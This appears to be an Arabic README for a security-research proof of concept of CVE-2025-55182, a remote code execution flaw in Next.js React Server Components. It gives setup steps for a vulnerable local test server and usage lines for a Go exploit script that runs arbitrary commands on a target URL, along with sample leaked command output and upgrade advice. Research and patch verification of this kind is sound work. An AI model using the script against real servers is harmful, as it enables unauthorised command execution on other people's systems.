
⚠️ هذه الأداة مخصصة لأغراض البحث الأمني والتعليم فقط. يُرجى عدم استخدامها لأغراض غير قانونية. ⚠️
CVE-2025-55182 هي ثغرة خطيرة في تنفيذ الأوامر عن بُعد (RCE) في إطار عمل Next.js. تنبع هذه الثغرة من مشكلة في إلغاء التسلسل غير الآمن (unsafe deserialization) عند معالجة Next.js لطلبات React Server Components (RSC). يمكن للمهاجم تنفيذ تعليمات برمجية عشوائية على الخادم دون تصريح عبر إنشاء طلبات HTTP خبيثة.
الإصدارات المتأثرة:
يوفر هذا المشروع خادم اختبار Next.js قابلًا للاستغلال باسم test-server.
تأكد من تثبيت Node.js و npm لديك.
cd test-server
npm install
npm run dev
يعمل الخادم افتراضيًا على http://localhost:3000.
ملاحظة: إذا واجهت خطأ في ملف القفل، يمكنك تجربة:
rm -f .next/dev/lock && npm run dev
يوفر هذا المشروع سكربت POC مكتوبًا بلغة Go باسم poc.go.
الاستخدام:
go run poc.go [URL الهدف] [الأمر المراد تنفيذه]
أمثلة:
تنفيذ أمر id (الافتراضي)
go run poc.go
أو
go run poc.go http://localhost:3000 id
عرض ملفات الدليل الحالي
go run poc.go http://localhost:3000 "ls -la"
عرض محتوى ملف
go run poc.go http://localhost:3000 "cat package.json"
المخرجات المتوقعة:
على الرغم من أن رمز حالة HTTP يعيد 500، إلا أن نتيجة تنفيذ الأمر ستُضمَّن في حقل digest داخل الاستجابة.
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}
قم بترقية Next.js إلى إصدار آمن:
npm install next@latest react@latest react-dom@latest